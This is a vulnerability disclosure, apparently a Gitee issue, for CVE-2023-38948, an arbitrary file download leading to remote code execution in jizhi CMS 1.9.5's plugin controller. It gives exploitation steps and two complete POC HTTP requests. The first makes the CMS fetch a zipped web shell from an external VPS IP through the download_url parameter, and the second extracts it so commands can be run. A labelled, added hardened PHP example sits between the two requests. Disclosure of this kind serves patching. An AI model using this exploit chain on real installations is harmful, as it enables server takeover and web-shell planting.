CVE-2023-38948: jizhi CMS 1.9.5 has an Arbitrary File Download RCE vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com
An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.
The vulnerable functionality is reached from http://127.0.0.1/admin.php/Index/index.html, under Extension management, where the plugin list offers downloads.
Click any plugin in the cloud plugin list to download it.
Capture the request with Burp Suite.
The download_url parameter can be tested.
Start an HTTP service on a VPS.
Zip phpshell.php and upload it to the VPS.
The arbitrary file download succeeds.
POC:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=start-download&filepath=jzdesign&download_url=http://119.91.26.244:8090/phpshell.zip
Vulnerability source code analysis:
Search the code base for start-download to locate the vulnerable file.
The vulnerability is located in /A/c/PluginsController.php.
Line 739 starts with a case statement, followed by an fwrite write operation.
On line 718 the controllable value is $download_url, and the write path is already fixed on line 721, so why can an arbitrary file be downloaded? The cause lies in the code starting at line 883: it sets the default file download URL, but on line 891 the controllable $download_url replaces it, and that URL reaches curl_exec. Because the curl request code does not restrict where it fetches from, arbitrary external resources can be requested, producing the arbitrary file download.
The decompression entry point is the case statement 'file-upzip' on line 776.
It checks whether the file exists; if it does, the file is saved under A/exts/ and get_zip_orginalsize is called to start decompression.
A while loop extracts each file.
Decompression succeeds.
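A hardened shape for the two steps analysed above, written as an added example and not taken from jizhi CMS: the plugin id is validated and the archive URL is built on the server, so the request's download_url is never used, curl is pinned to HTTPS without redirects, and every zip entry name is checked before extraction. The plugin server host, the constants and the function names are assumptions.

```php
<?php
// Added example, not jizhi CMS's own code: a hardened version of the
// start-download and file-upzip steps. Host, paths and names are assumed.

const PLUGIN_SERVER = 'https://plugins.example.invalid/'; // placeholder host
const PLUGIN_DIR    = __DIR__ . '/A/exts';
const PLUGIN_TMP    = __DIR__ . '/runtime/plugins';

// The archive URL is derived from the validated plugin id on the server; the
// client's download_url parameter is never read, so it cannot override the default.
function plugin_archive_url(string $filepath): string {
    if (!preg_match('/^[a-z0-9_]{1,32}$/i', $filepath)) {
        throw new InvalidArgumentException('bad plugin id');
    }
    return PLUGIN_SERVER . rawurlencode($filepath) . '.zip';
}

function fetch_plugin(string $filepath): string {
    $ch = curl_init(plugin_archive_url($filepath));
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,           // a redirect could leave the plugin server
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS, // no http/file/ftp fetches
        CURLOPT_TIMEOUT        => 30,
    ]);
    $body = curl_exec($ch);
    $ok = $body !== false && curl_getinfo($ch, CURLINFO_RESPONSE_CODE) === 200;
    curl_close($ch);
    if (!$ok) { throw new RuntimeException('plugin download failed'); }
    $zip = PLUGIN_TMP . '/' . $filepath . '.zip'; // name comes from the id, not the URL
    file_put_contents($zip, $body);
    return $zip;
}

// Extract into A/exts/<plugin id>/ only after checking every entry name,
// so an archive cannot write outside the plugin's own directory.
function extract_plugin(string $zipPath, string $filepath): void {
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException('not a valid zip archive');
    }
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === '' || $name[0] === '/' || strpos($name, '..') !== false) {
            $zip->close();
            throw new RuntimeException("refusing to extract entry $name");
        }
    }
    $zip->extractTo(PLUGIN_DIR . '/' . $filepath);
    $zip->close();
}
```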
POC:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=file-upzip&filepath=jzdesign
The extracted file is then reachable at http://127.0.0.1/A/exts/phpshell.php.
Executing a command through it succeeds, confirming RCE.